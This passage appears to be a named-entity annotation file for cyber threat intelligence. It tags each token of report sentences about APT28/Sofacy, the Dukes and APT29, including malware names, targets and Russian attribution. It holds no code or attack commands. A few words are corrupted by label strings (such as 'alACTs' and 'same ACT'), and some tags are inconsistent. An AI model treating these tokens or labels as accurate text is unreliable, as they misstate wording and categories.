+intrusion B-ACT
+campaigns E-ACT
+against O
+the O
+Aerospace S-IDTY
+, O
+Defense S-IDTY
+, O
+Energy S-IDTY
+, O
+Government S-IDTY
+and O
+Media B-IDTY
+sectors E-IDTY
+. O
+
+APT28 S-MAL
+malware S-MAL
+, O
+in O
+particular O
+the O
+family O
+of O
+modular O
+backdoors O
+that O
+we O
+call O
+CHOPSTICK S-MAL
+, O
+indicates O
+a O
+formal O
+code O
+development O
+environment O
+. O
+
+However O
+, O
+three O
+themes O
+in O
+APT28 S-APT
+'s O
+targeting O
+clearly O
+reflects O
+LOCs O
+of O
+specific O
+interest O
+to O
+an O
+Eastern B-LOC
+European E-LOC
+government S-IDTY
+, O
+most O
+likely O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+We O
+identified O
+three O
+themes O
+in O
+APT28 S-APT
+'s O
+lures O
+and O
+registered O
+domains O
+, O
+which O
+together O
+are O
+particularly O
+relevant O
+to O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+Georgian O
+military O
+security O
+issues O
+, O
+particularly O
+with O
+regard O
+to O
+U.S. S-LOC
+cooperation O
+and O
+NATO O
+, O
+provide O
+a O
+strong O
+incentive O
+for O
+Russian S-LOC
+state-sponsored O
+threat O
+actors S-APT
+to O
+steal O
+information O
+that O
+sheds O
+light O
+on O
+these O
+topics O
+. O
+
+Instead O
+, O
+we O
+observed O
+the O
+two O
+Russian S-LOC
+espionage B-APT
+groups E-APT
+compromise O
+the O
+same O
+systems O
+and O
+engage O
+separately O
+in O
+the O
+theft O
+of O
+identical O
+credentials O
+. O
+
+APT28 S-APT
+'s O
+malware O
+settings O
+suggest O
+that O
+the O
+developers O
+have O
+done O
+the O
+majority O
+of O
+their O
+work O
+in O
+a O
+Russian S-LOC
+language O
+build O
+environment O
+during O
+Russian S-LOC
+business O
+hours O
+, O
+which O
+suggests O
+that O
+the O
+Russian B-IDTY
+government E-IDTY
+is O
+APT28 S-APT
+'s O
+sponsor O
+. O
+
+We O
+believe O
+that O
+APT28 S-APT
+'s O
+targeting O
+of O
+the O
+MOD O
+aligns O
+with O
+Russian S-LOC
+threat O
+perceptions O
+. O
+
+We O
+assess O
+that O
+APT28 S-APT
+is O
+most O
+likely O
+sponsored O
+by O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+Given O
+the O
+available O
+data O
+, O
+we O
+assess O
+that O
+APT28 S-APT
+'s O
+work O
+is O
+sponsored O
+by O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+The O
+targets O
+were O
+similar O
+to O
+a O
+2015 S-TIME
+TG-4127 B-ACT
+campaign E-ACT
+— O
+individuals O
+in O
+Russia S-LOC
+and O
+the O
+former B-LOC
+Soviet E-LOC
+states O
+, O
+current O
+and O
+former O
+military S-IDTY
+and O
+government B-IDTY
+personnel E-IDTY
+in O
+the O
+U.S. S-LOC
+and O
+Europe S-LOC
+, O
+individuals O
+working O
+in O
+the O
+defense S-IDTY
+and O
+government S-IDTY
+supply O
+chain O
+, O
+and O
+authors S-IDTY
+and O
+journalists S-IDTY
+— O
+but O
+also O
+included O
+email S-ACT
+accounts O
+linked O
+to O
+the O
+November B-TIME
+2016 E-TIME
+United B-LOC
+States E-LOC
+presidential O
+election O
+. O
+
+The O
+targets O
+of O
+TG-4127 S-APT
+include O
+military S-IDTY
+, O
+government S-IDTY
+and O
+defense B-IDTY
+sectors E-IDTY
+. O
+
+Some O
+of O
+APT28 S-APT
+'s O
+more O
+commonly O
+used O
+tools O
+are O
+the O
+SOURFACE B-MAL
+downloader E-MAL
+, O
+its O
+second O
+stage O
+backdoor O
+EVILTOSS S-MAL
+, O
+and O
+a O
+modular B-MAL
+family I-MAL
+of I-MAL
+implants E-MAL
+that O
+we O
+call O
+CHOPSTICK S-MAL
+. O
+
+While O
+TG-4127 S-APT
+continues O
+to O
+primarily O
+threaten O
+organizations O
+and O
+individuals O
+operating O
+in O
+Russia S-LOC
+and O
+former B-LOC
+Soviet E-LOC
+states O
+, O
+this O
+campaign O
+illustrates O
+its O
+willingness O
+to O
+expand O
+its O
+scope O
+to O
+other O
+targets O
+that O
+have O
+intelligence O
+of O
+interest O
+to O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+CTU S-SECTEAM
+researchers O
+assess O
+with O
+moderate O
+confidence O
+that O
+the O
+group O
+is O
+operating O
+from O
+the O
+Russian S-LOC
+Federation O
+and O
+is O
+gathering O
+intelligence O
+on O
+behalf O
+of O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+This O
+intelligence O
+has O
+been O
+critical O
+to O
+protecting O
+and O
+informing O
+our O
+clients O
+, O
+exposing O
+this O
+threat O
+, O
+and O
+strengthening O
+our O
+confidence O
+in O
+attributing O
+APT28 S-APT
+to O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+Our O
+visibility O
+into O
+the O
+operations O
+of O
+APT28 S-APT
+- O
+a O
+group O
+we O
+believe O
+the O
+Russian B-IDTY
+government E-IDTY
+sponsors O
+- O
+has O
+given O
+us O
+insight O
+into O
+some O
+of O
+the O
+government S-IDTY
+'s O
+targets O
+, O
+as O
+well O
+as O
+its O
+objectives O
+and O
+the O
+activities S-ACT
+designed O
+to O
+further O
+them O
+. O
+
+Since O
+at O
+least O
+2007 S-TIME
+, O
+APT28 S-APT
+has O
+engaged O
+in O
+extensive O
+operations O
+in O
+support O
+of O
+Russian S-LOC
+strategic O
+interests O
+. O
+
+APT28 B-ACT
+espionage I-ACT
+activity E-ACT
+has O
+primarily O
+targeted O
+entities O
+in O
+the O
+U.S. S-LOC
+, O
+Europe S-LOC
+, O
+and O
+the O
+countries O
+of O
+the O
+former B-LOC
+Soviet I-LOC
+Union E-LOC
+, O
+including O
+governments S-IDTY
+, O
+militaries S-IDTY
+, O
+defense B-IDTY
+attaches E-IDTY
+, O
+media B-IDTY
+entities E-IDTY
+, O
+and O
+dissidents S-IDTY
+and O
+figures S-IDTY
+opposed O
+to O
+the O
+current O
+Russian B-IDTY
+government E-IDTY
+. O
+
+APT28 B-ACT
+espionage I-ACT
+activity E-ACT
+has O
+primarily O
+targeted O
+entities O
+in O
+the O
+U.S. S-LOC
+, O
+Europe S-LOC
+, O
+and O
+the O
+countries O
+of O
+the O
+former B-LOC
+Soviet I-LOC
+Union E-LOC
+, O
+including O
+governments S-IDTY
+and O
+militaries S-IDTY
+, O
+defense B-IDTY
+attaches E-IDTY
+, O
+media B-IDTY
+entities E-IDTY
+, O
+and O
+dissidents S-IDTY
+and O
+figures S-IDTY
+opposed O
+to O
+the O
+current O
+Russian B-IDTY
+government E-IDTY
+. O
+
+Over O
+the O
+past O
+two O
+years O
+, O
+Russia S-LOC
+appears O
+to O
+have O
+increasingly O
+leveraged O
+APT28 S-APT
+to O
+conduct O
+information O
+operations O
+commensurate O
+with O
+broader O
+strategic O
+military O
+doctrine O
+. O
+
+After O
+compromising O
+a O
+victim O
+organization O
+, O
+APT28 S-APT
+will O
+steal O
+internal O
+data O
+that O
+is O
+then O
+leaked O
+to O
+further O
+political O
+narratives O
+aligned O
+with O
+Russian S-LOC
+interests O
+. O
+
+After O
+compromising O
+a O
+political B-IDTY
+organization E-IDTY
+, O
+APT28 S-APT
+will O
+steal O
+internal O
+data O
+. O
+
+On O
+December B-TIME
+29 I-TIME
+, I-TIME
+2016 E-TIME
+, O
+the O
+Department B-SECTEAM
+of I-SECTEAM
+Homeland I-SECTEAM
+Security E-SECTEAM
+( O
+DHS S-SECTEAM
+) O
+and O
+Federal O
+Bureau O
+of O
+Investigation O
+( O
+FBI S-SECTEAM
+) O
+released O
+a O
+Joint O
+Analysis O
+Report O
+confirming O
+FireEye S-SECTEAM
+'s O
+long O
+held O
+public O
+assessment O
+that O
+the O
+Russian B-IDTY
+government E-IDTY
+sponsors O
+APT28 S-APT
+. O
+
+In O
+October B-TIME
+2014 E-TIME
+, O
+FireEye S-SECTEAM
+released O
+APT28 S-APT
+: O
+A O
+Window O
+into O
+Russia S-LOC
+'s O
+Cyber B-ACT
+Espionage I-ACT
+Operations E-ACT
+, O
+and O
+characterized O
+APT28 S-APT
+'s O
+activity O
+as O
+aligning O
+with O
+the O
+Russian B-IDTY
+government E-IDTY
+'s O
+strategic O
+intelligence O
+requirements O
+. O
+
+In O
+October B-TIME
+2014 E-TIME
+, O
+FireEye S-SECTEAM
+released O
+APT28 S-APT
+: O
+A O
+Window O
+into O
+Russia S-LOC
+'s O
+Cyber B-ACT
+Espionage E-ACT
+Operations' O
+, O
+and O
+characterized O
+APT28 S-APT
+'s O
+activity O
+as O
+aligning O
+with O
+the O
+Russian B-IDTY
+government E-IDTY
+'s O
+strategic O
+intelligence O
+requirements O
+. O
+
+APT28 S-APT
+targets O
+Russian S-LOC
+rockers S-IDTY
+and O
+dissidents B-IDTY
+Pussy I-IDTY
+Riot E-IDTY
+via O
+spear-phishing S-ACT
+emails S-TOOL
+. O
+
+Our O
+investigation O
+of O
+APT28 S-APT
+'s O
+compromise O
+of O
+WADA S-IDTY
+'s O
+network O
+, O
+and O
+our O
+observations O
+of O
+the O
+surrounding O
+events O
+reveal O
+how O
+Russia S-LOC
+sought O
+to O
+counteract O
+a O
+damaging O
+narrative O
+and O
+delegitimize O
+the O
+institutions O
+leveling O
+criticism O
+. O
+
+Since O
+releasing O
+our O
+2014 S-TIME
+report O
+, O
+we O
+continue O
+to O
+assess O
+that O
+APT28 S-APT
+is O
+sponsored O
+by O
+the O
+Russian B-IDTY
+government E-IDTY
+. O
+
+In O
+our O
+2014 S-TIME
+report O
+, O
+we O
+identified O
+APT28 S-APT
+as O
+a O
+suspected O
+Russian S-LOC
+government-sponsored O
+espionage S-ACT
+actor O
+. O
+
+For O
+full O
+details O
+, O
+please O
+reference O
+our O
+2014 S-TIME
+report O
+, O
+APT28 S-APT
+: O
+A O
+Window O
+into O
+Russia S-LOC
+'s O
+Cyber B-ACT
+Espionage I-ACT
+Operations E-ACT
+. O
+
+The O
+espionage S-ACT
+group O
+, O
+which O
+according O
+to O
+the O
+U.S. S-LOC
+Department B-SECTEAM
+of I-SECTEAM
+Homeland I-SECTEAM
+Security E-SECTEAM
+( O
+DHS S-SECTEAM
+) O
+and O
+the O
+Federal O
+Bureau O
+of O
+Investigation O
+( O
+FBI S-SECTEAM
+) O
+is O
+linked O
+to O
+the O
+Russian B-IDTY
+government E-IDTY
+, O
+returned O
+to O
+low-key O
+intelligence-gathering O
+operations O
+during O
+2017 S-TIME
+and O
+into O
+2018 S-TIME
+, O
+targeting O
+a O
+range O
+of O
+military S-IDTY
+and O
+government S-IDTY
+targets O
+in O
+Europe S-LOC
+and O
+South B-LOC
+America E-LOC
+. O
+
+The O
+APT28 S-APT
+, O
+which O
+is O
+linked O
+to O
+the O
+Russian B-IDTY
+government E-IDTY
+, O
+returned O
+to O
+low-key O
+intelligence-gathering O
+operations O
+during O
+2017 S-TIME
+and O
+into O
+2018 S-TIME
+, O
+targeting O
+a O
+range O
+of O
+military S-IDTY
+and O
+government S-IDTY
+targets O
+in O
+Europe S-LOC
+and O
+South B-LOC
+America E-LOC
+. O
+
+Another O
+attack O
+group O
+, O
+Earworm S-APT
+( O
+aka O
+Zebrocy S-APT
+) O
+, O
+has O
+been O
+active O
+since O
+at O
+least O
+May B-TIME
+2016 E-TIME
+and O
+is O
+involved O
+in O
+what O
+appears O
+to O
+be O
+intelligence O
+gathering O
+operations O
+against O
+military O
+targets O
+in O
+Europe S-LOC
+, O
+Central B-LOC
+Asia E-LOC
+, O
+and O
+Eastern B-LOC
+Asia E-LOC
+. O
+
+Several O
+sources O
+consider O
+APT28 S-APT
+a O
+group O
+of O
+CyberMercs O
+based O
+in O
+Russia S-LOC
+. O
+
+The O
+primary O
+targets O
+of O
+APT28 S-APT
+are O
+potential O
+victims O
+in O
+several O
+countries O
+such O
+as O
+Ukraine S-LOC
+, O
+Spain S-LOC
+, O
+Russia S-LOC
+, O
+Romania S-LOC
+, O
+the O
+United B-LOC
+States E-LOC
+and O
+Canada S-LOC
+. O
+
+We O
+have O
+reasons O
+to O
+believe O
+that O
+the O
+operators S-APT
+of O
+the O
+APT28 S-APT
+network O
+are O
+either O
+Russian S-LOC
+citizens S-IDTY
+or O
+citizens S-IDTY
+of O
+a O
+neighboring O
+country O
+that O
+speak O
+Russian S-LOC
+. O
+
+Previous O
+work O
+published O
+by O
+security O
+vendor O
+FireEye S-SECTEAM
+in O
+October B-TIME
+2014 E-TIME
+suggests O
+the O
+group O
+might O
+be O
+of O
+Russian S-LOC
+origin O
+. O
+
+Finally O
+, O
+the O
+use O
+of O
+recent O
+domestic O
+events O
+and O
+a O
+prominent O
+US S-LOC
+military S-IDTY
+exercise O
+focused O
+on O
+deterring O
+Russian S-LOC
+aggression O
+highlight O
+APT28 S-APT
+'s O
+ability O
+and O
+interest O
+in O
+exploiting O
+geopolitical S-IDTY
+events O
+for O
+their O
+operations O
+. O
+
+In O
+2013 S-TIME
+, O
+the O
+Sofacy B-APT
+group E-APT
+expanded O
+their O
+arsenal O
+and O
+added O
+more O
+backdoors O
+and O
+tools O
+, O
+including O
+CORESHELL S-MAL
+, O
+SPLM S-MAL
+, O
+JHUHUGIT S-MAL
+, O
+AZZY S-MAL
+and O
+a O
+few O
+others O
+. O
+
+In O
+2013 S-TIME
+, O
+the O
+Sofacy B-APT
+group E-APT
+expanded O
+their O
+arsenal O
+and O
+added O
+more O
+backdoors O
+and O
+tools O
+, O
+including O
+CORESHELL S-MAL
+, O
+SPLM S-MAL
+( O
+aka O
+Xagent S-MAL
+, O
+aka O
+CHOPSTICK S-MAL
+) O
+, O
+JHUHUGIT S-MAL
+( O
+which O
+is O
+built O
+with O
+code O
+from O
+the O
+Carberp S-MAL
+sources O
+) O
+, O
+AZZY S-MAL
+( O
+aka O
+ADVSTORESHELL O
+, O
+NETUI O
+, O
+EVILTOSS S-MAL
+, O
+and O
+spans O
+across O
+4-5 O
+generations O
+) O
+and O
+a O
+few O
+others O
+. O
+
+The O
+Sofacy B-APT
+group E-APT
+spearphished O
+targets O
+in O
+several O
+waves O
+with O
+Flash S-TOOL
+exploits S-VULNAME
+leading O
+to O
+their O
+Carberp S-MAL
+based O
+JHUHUGIT B-MAL
+downloaders E-MAL
+and O
+further O
+stages O
+of O
+malware O
+. O
+
+APT28 S-APT
+spearphished O
+targets O
+in O
+several O
+waves O
+with O
+Flash S-TOOL
+exploits S-VULNAME
+leading O
+to O
+their O
+Carberp S-MAL
+based O
+JHUHUGIT B-MAL
+downloaders E-MAL
+and O
+further O
+stages O
+of O
+malware O
+. O
+
+The O
+group O
+spearphished O
+targets O
+in O
+several O
+waves O
+with O
+Flash S-TOOL
+exploits S-VULNAME
+leading O
+to O
+their O
+Carberp S-MAL
+based O
+JHUHUGIT B-MAL
+downloaders E-MAL
+and O
+further O
+stages O
+of O
+malware O
+. O
+
+Their O
+evolving O
+and O
+modified O
+SPLM S-MAL
+, O
+CHOPSTICK S-MAL
+, O
+XAgent S-MAL
+code O
+is O
+a O
+long-standing O
+part O
+of O
+Sofacy B-ACT
+activity E-ACT
+, O
+however O
+much O
+of O
+it O
+is O
+changing O
+. O
+
+FireEye S-SECTEAM
+has O
+moderate O
+confidence O
+that O
+a O
+campaign O
+targeting O
+the O
+hospitality B-IDTY
+sector E-IDTY
+is O
+attributed O
+to O
+Russian S-LOC
+actor B-APT
+APT28 E-APT
+. O
+
+APT28 S-APT
+is O
+using O
+novel O
+techniques O
+involving O
+the O
+EternalBlue S-VULNAME
+exploits S-VULNAME
+and O
+the O
+open B-MAL
+source I-MAL
+tool E-MAL
+Responder S-MAL
+to O
+spread O
+laterally O
+through O
+networks O
+and O
+likely O
+target O
+travelers O
+. O
+
+Upon O
+gaining O
+access O
+to O
+the O
+machines O
+connected O
+to O
+corporate O
+and O
+guest O
+Wi-Fi O
+networks O
+, O
+APT28 S-APT
+deployed O
+Responder S-MAL
+. O
+
+Compared O
+to O
+other O
+backdoor B-MAL
+tools E-MAL
+associated O
+with O
+the O
+Sofacy B-APT
+group E-APT
+, O
+the O
+use O
+of O
+Zebrocy S-MAL
+in O
+attack B-ACT
+campaigns E-ACT
+is O
+far O
+more O
+widespread O
+. O
+
+As O
+alluded O
+to O
+in O
+our O
+previous O
+blog O
+regarding O
+the O
+Cannon B-MAL
+tool E-MAL
+, O
+the O
+Sofacy B-APT
+group E-APT
+( O
+AKA O
+Fancy B-APT
+Bear E-APT
+, O
+APT28 S-APT
+, O
+STRONTIUM S-APT
+, O
+Pawn B-APT
+Storm E-APT
+, O
+Sednit S-APT
+) O
+has O
+persistently O
+attacked O
+various O
+government S-IDTY
+and O
+private O
+organizations O
+around O
+the O
+world O
+from O
+mid-October B-TIME
+2018 E-TIME
+through O
+mid-November B-TIME
+2018 E-TIME
+. O
+
+Russian S-LOC
+citizens—journalists S-IDTY
+, O
+software B-IDTY
+developers E-IDTY
+, O
+politicians S-IDTY
+, O
+researchers B-IDTY
+at I-IDTY
+universities E-IDTY
+, O
+and O
+artists S-IDTY
+are O
+also O
+targeted O
+by O
+Pawn B-APT
+Storm E-APT
+. O
+
+The O
+JHUHUGIT S-MAL
+implant O
+became O
+a O
+relatively O
+popular O
+first O
+stage O
+for O
+the O
+Sofacy B-ACT
+attacks E-ACT
+and O
+was O
+used O
+again O
+with O
+a O
+Java S-TOOL
+zero-day S-VULNAME
+( O
+CVE-2015-2590 S-VULID
+) O
+in O
+July B-TIME
+2015 E-TIME
+. O
+
+While O
+the O
+JHUHUGIT S-MAL
+( O
+and O
+more O
+recently O
+, O
+" O
+JKEYSKW S-MAL
+" O
+) O
+implant O
+used O
+in O
+most O
+of O
+the O
+Sofacy B-ACT
+attacks E-ACT
+, O
+high O
+profile O
+victims O
+are O
+being O
+targeted O
+with O
+another O
+first O
+level O
+implant O
+, O
+representing O
+the O
+latest O
+evolution O
+of O
+their O
+AZZY B-MAL
+Trojan E-MAL
+. O
+
+Once O
+a O
+foothold O
+is O
+established O
+, O
+Sofacy S-APT
+trys O
+to O
+upload O
+more O
+backdoors S-MAL
+, O
+USB B-MAL
+stealers E-MAL
+as O
+well O
+as O
+other O
+hacking O
+tools O
+such O
+as O
+" O
+Mimikatz S-MAL
+" O
+for O
+lateral O
+movement O
+. O
+
+Once O
+a O
+foothold O
+is O
+established O
+, O
+they O
+try O
+to O
+upload O
+more O
+backdoors S-MAL
+, O
+USB B-MAL
+stealers E-MAL
+as O
+well O
+as O
+other O
+hacking O
+tools O
+such O
+as O
+" O
+Mimikatz S-MAL
+" O
+for O
+lateral O
+movement O
+. O
+
+The O
+Sofacy B-APT
+threat I-APT
+group E-APT
+continues O
+to O
+target O
+government B-IDTY
+organizations E-IDTY
+in O
+the O
+EU S-LOC
+, O
+US S-LOC
+, O
+and O
+former B-LOC
+Soviet E-LOC
+states O
+to O
+deliver O
+the O
+Zebrocy B-MAL
+tool E-MAL
+as O
+a O
+payload O
+. O
+
+Of O
+note O
+, O
+we O
+also O
+discovered O
+the O
+Sofacy B-APT
+group E-APT
+using O
+a O
+very O
+similar O
+delivery O
+document O
+to O
+deliver O
+a O
+new O
+Trojan S-MAL
+called O
+Cannon S-MAL
+. O
+
+Komplex S-MAL
+shares O
+a O
+significant O
+amount O
+of O
+functionality O
+and O
+traits O
+with O
+another O
+tool O
+used O
+by O
+Sofacy S-APT
+– O
+the O
+Carberp S-MAL
+variant O
+that O
+Sofacy S-APT
+had O
+used O
+in O
+previous O
+attack B-ACT
+campaigns E-ACT
+on O
+systems O
+running O
+Windows S-OS
+. O
+
+The O
+Sofacy B-APT
+group E-APT
+created O
+the O
+Komplex B-MAL
+Trojan E-MAL
+to O
+use O
+in O
+attack B-ACT
+campaigns E-ACT
+targeting O
+the O
+OS O
+X O
+operating O
+system O
+– O
+a O
+move O
+that O
+showcases O
+their O
+continued O
+evolution O
+toward O
+multi-platform O
+attacks O
+. O
+
+The O
+Komplex B-MAL
+Trojan E-MAL
+revealed O
+a O
+design O
+similar O
+to O
+Sofacy S-APT
+'s O
+Carberp S-MAL
+variant O
+Trojan S-MAL
+, O
+which O
+we O
+believe O
+may O
+have O
+been O
+done O
+in O
+order O
+to O
+handle O
+compromised O
+Windows S-OS
+and O
+OS O
+X O
+systems O
+using O
+the O
+same O
+C2 S-TOOL
+server O
+application O
+with O
+relative O
+ease O
+. O
+
+This O
+whitepaper O
+explores O
+the O
+tools O
+- O
+such O
+as O
+MiniDuke S-MAL
+, O
+CosmicDuke S-MAL
+, O
+OnionDuke S-MAL
+, O
+CozyDuke S-MAL
+, O
+etc- O
+of O
+the O
+Dukes S-APT
+, O
+a O
+well-resourced O
+, O
+highly O
+dedicated O
+and O
+organized O
+cyberespionage S-ACT
+group O
+that O
+we O
+believe O
+has O
+been O
+working O
+for O
+the O
+Russian S-LOC
+Federation O
+since O
+at O
+least O
+2008 S-TIME
+to O
+collect O
+intelligence O
+in O
+support O
+of O
+foreign O
+and O
+security O
+policy O
+decision-making O
+. O
+
+The O
+Dukes S-APT
+are O
+a O
+well-resourced O
+, O
+highly O
+dedicated O
+and O
+organized O
+cyberespionage S-ACT
+group O
+that O
+we O
+believe O
+has O
+been O
+working O
+for O
+the O
+Russian S-LOC
+Federation O
+since O
+at O
+least O
+2008 S-TIME
+to O
+collect O
+intelligence O
+in O
+support O
+of O
+foreign O
+and O
+security O
+policy O
+decision-making O
+. O
+
+The O
+Dukes S-APT
+are O
+known O
+to O
+employ O
+a O
+vast O
+arsenal O
+of O
+malware O
+toolsets O
+, O
+which O
+we O
+identify O
+as O
+MiniDuke S-MAL
+, O
+CosmicDuke S-MAL
+, O
+OnionDuke S-MAL
+, O
+CozyDuke S-MAL
+, O
+CloudDuke S-MAL
+, O
+SeaDuke S-MAL
+, O
+HammerDuke S-MAL
+, O
+PinchDuke S-MAL
+, O
+and O
+GeminiDuke S-MAL
+. O
+
+The O
+origins O
+of O
+the O
+Duke O
+toolset O
+names O
+can O
+be O
+traced O
+back O
+to O
+when O
+researchers O
+at O
+Kaspersky B-SECTEAM
+Labs E-SECTEAM
+coined O
+the O
+term O
+" O
+MiniDuke S-MAL
+" O
+to O
+identify O
+the O
+first O
+Duke-related S-MAL
+malware S-MAL
+they O
+found O
+. O
+
+As O
+researchers O
+continued O
+discovering O
+new O
+toolsets O
+that O
+were O
+created O
+and O
+used O
+by O
+the O
+same O
+group O
+that O
+had O
+been O
+operating O
+MiniDuke S-MAL
+, O
+and O
+thus O
+the O
+threat O
+actor O
+operating O
+the O
+toolsets O
+started O
+to O
+be O
+commonly O
+referred O
+to O
+as O
+" O
+Dukes S-APT
+" O
+. O
+
+Based O
+on O
+the O
+campaign O
+identifiers O
+found O
+in O
+PinchDuke B-MAL
+samples E-MAL
+discovered O
+from O
+2009 S-TIME
+, O
+the O
+targets O
+of O
+the O
+Dukes B-APT
+group E-APT
+during O
+that O
+year O
+included O
+organizations O
+such O
+as O
+the O
+Ministry B-IDTY
+of I-IDTY
+Defense E-IDTY
+of O
+Georgia O
+and O
+the O
+ministries B-IDTY
+of I-IDTY
+foreign I-IDTY
+affairs E-IDTY
+of O
+Turkey S-LOC
+and O
+Uganda S-LOC
+. O
+
+Importantly O
+, O
+PinchDuke B-MAL
+trojan I-MAL
+samples E-MAL
+alACTs O
+contain O
+a O
+notable O
+text O
+string O
+, O
+which O
+we O
+believe O
+is O
+used O
+as O
+a O
+campaign O
+identifier O
+by O
+the O
+Dukes B-APT
+group E-APT
+to O
+distinguish O
+between O
+multiple O
+attack B-ACT
+campaigns E-ACT
+that O
+are O
+run O
+in O
+parallel O
+. O
+
+This O
+neatly O
+ties O
+together O
+many O
+of O
+the O
+tools O
+used O
+by O
+the O
+Dukes B-APT
+group E-APT
+, O
+as O
+versions O
+of O
+this O
+one O
+loader O
+have O
+been O
+used O
+to O
+load O
+malware O
+from O
+three O
+different O
+Dukes-related O
+toolsets O
+CosmicDuke S-MAL
+, O
+PinchDuke S-MAL
+, O
+and O
+MiniDuke S-MAL
+– O
+over O
+the O
+course O
+of O
+five O
+years O
+. O
+
+The O
+Dukes S-APT
+continued O
+the O
+expansion O
+of O
+their O
+arsenal O
+in O
+2011 S-TIME
+with O
+the O
+addition O
+of O
+two O
+more O
+toolsets O
+: O
+MiniDuke S-MAL
+and O
+CozyDuke S-MAL
+. O
+
+As O
+we O
+now O
+know O
+, O
+by O
+February B-TIME
+2013 E-TIME
+the O
+Dukes B-APT
+group E-APT
+had O
+been O
+operating O
+MiniDuke S-MAL
+and O
+other O
+toolsets O
+for O
+at O
+least O
+4 O
+and O
+a O
+half O
+years O
+. O
+
+Secondly O
+, O
+the O
+value O
+the O
+Dukes S-APT
+intended O
+to O
+gain O
+from O
+these O
+MiniDuke B-ACT
+campaigns E-ACT
+may O
+have O
+been O
+so O
+great O
+that O
+they O
+deemed O
+it O
+worth O
+the O
+risk O
+of O
+getting O
+noticed O
+. O
+
+This O
+is O
+in O
+stark O
+contrast O
+to O
+some O
+other O
+suspected O
+Russian S-LOC
+threat O
+actors S-APT
+( O
+such O
+as O
+Operation B-ACT
+Pawn I-ACT
+Storm E-ACT
+) O
+who O
+appear O
+to O
+have O
+increased O
+their O
+targeting O
+of O
+Ukraine S-LOC
+following O
+the O
+crisis O
+. O
+
+The O
+Dukes S-APT
+actively O
+targeted O
+Ukraine S-LOC
+before O
+the O
+crisis O
+, O
+at O
+a O
+time O
+when O
+Russia S-LOC
+was O
+still O
+weighing O
+her O
+options O
+, O
+but O
+once O
+Russia S-LOC
+moved O
+from O
+diplomacy O
+to O
+direct O
+action O
+, O
+Ukraine S-LOC
+was O
+no O
+longer O
+relevant O
+to O
+the O
+Dukes S-APT
+in O
+the O
+same O
+ACT O
+. O
+
+In O
+the O
+latter O
+case O
+however O
+, O
+the O
+Dukes B-APT
+group E-APT
+appear O
+to O
+have O
+also O
+simultaneously O
+developed O
+an O
+entirely O
+new O
+loader O
+, O
+which O
+we O
+first O
+observed O
+being O
+used O
+in O
+conjunction O
+with O
+CosmicDuke S-MAL
+during O
+the O
+spring B-TIME
+of I-TIME
+2015 E-TIME
+. O
+
+The O
+Dukes S-APT
+could O
+have O
+ceased O
+all O
+use O
+of O
+CosmicDuke S-MAL
+( O
+at O
+least O
+until O
+they O
+had O
+developed O
+a O
+new O
+loader O
+) O
+or O
+retired O
+it O
+entirely O
+, O
+since O
+they O
+still O
+had O
+other O
+toolsets O
+available O
+. O
+
+For O
+these O
+CozyDuke B-ACT
+campaigns E-ACT
+however O
+, O
+the O
+Dukes S-APT
+appear O
+to O
+have O
+employed O
+two O
+particular O
+later-stage O
+toolsets O
+, O
+SeaDuke S-MAL
+and O
+HammerDuke S-MAL
+. O
+
+Firstly O
+, O
+as O
+with O
+the O
+MiniDuke B-ACT
+campaigns E-ACT
+of O
+February B-TIME
+2013 E-TIME
+and O
+CosmicDuke B-ACT
+campaigns E-ACT
+in O
+the O
+summer B-TIME
+of I-TIME
+2014 E-TIME
+, O
+again O
+the O
+group O
+clearly O
+prioritized O
+the O
+continuation O
+of O
+their O
+operations O
+over O
+maintaining O
+stealth O
+. O
+
+In O
+addition O
+to O
+the O
+notably O
+overt O
+and O
+large-scale O
+campaigns S-ACT
+with O
+CozyDuke S-ACT
+and O
+CloudDuke S-ACT
+, O
+the O
+Dukes S-APT
+also O
+continued O
+to O
+engage O
+in O
+more O
+covert O
+, O
+surgical O
+campaigns S-ACT
+using O
+CosmicDuke S-MAL
+. O
+
+We O
+are O
+however O
+only O
+aware O
+of O
+one O
+instance O
+- O
+the O
+exploitation O
+of O
+CVE-2013-0640 S-VULID
+to O
+deploy O
+MiniDuke S-MAL
+- O
+where O
+we O
+believe O
+the O
+exploited O
+vulnerability O
+was O
+a O
+zero-day S-VULNAME
+at O
+the O
+time O
+that O
+the O
+group O
+acquired O
+the O
+exploit S-VULNAME
+. O
+
+All O
+of O
+the O
+available O
+evidence O
+however O
+does O
+in O
+our O
+opinion O
+suggest O
+that O
+the O
+group O
+operates O
+on O
+behalf O
+of O
+the O
+Russian S-LOC
+Federation O
+. O
+
+This O
+assertion O
+of O
+time O
+zone O
+is O
+also O
+supported O
+by O
+timestamps O
+found O
+in O
+many O
+GeminiDuke B-MAL
+samples E-MAL
+, O
+which O
+similarly O
+suggest O
+the O
+group O
+work O
+in O
+the O
+Moscow O
+Standard O
+TIME O
+timezone O
+, O
+as O
+further O
+detailed O
+in O
+the O
+section O
+on O
+the O
+technical O
+analysis O
+of O
+GeminiDuke S-MAL
+. O
+
+Mandiant S-SECTEAM
+has O
+observed O
+Russian S-LOC
+nation-state O
+attackers S-APT
+APT29 S-APT
+employing O
+domain O
+fronting O
+techniques O
+for O
+stealthy O
+backdoor O
+access O
+to O
+victim O
+environments O
+for O
+at O
+least O
+two O
+years O
+. O
+
+APT29 S-APT
+has O
+used O
+The B-MAL
+Onion I-MAL
+Router E-MAL
+and O
+the O
+TOR B-MAL
+domain I-MAL
+fronting I-MAL
+plugin I-MAL
+meek E-MAL
+to O
+create O
+a O
+hidden O
+, O
+encrypted O
+network O
+tunnel O
+that O
+appeared O
+to O
+connect O
+to O
+Google S-IDTY
+services O
+over O
+TLS O
+. O
+
+Mandiant S-SECTEAM
+has O
+observed O
+APT29 S-APT
+using O
+a O
+stealthy O
+backdoor O
+that O
+we O
+call O
+POSHSPY S-MAL
+. O
+
+Mandiant S-SECTEAM
+has O
+since O
+identified O
+POSHSPY S-MAL
+in O
+several O
+other O
+environments O
+compromised O
+by O
+APT29 S-APT
+over O
+the O
+past O
+two O
+years O
+. O
+
+In O
+the O
+investigations O
+Mandiant S-SECTEAM
+has O
+conducted O
+, O
+it O
+appeared O
+that O
+APT29 S-APT
+deployed O
+POSHSPY S-MAL
+as O
+a O
+secondary O
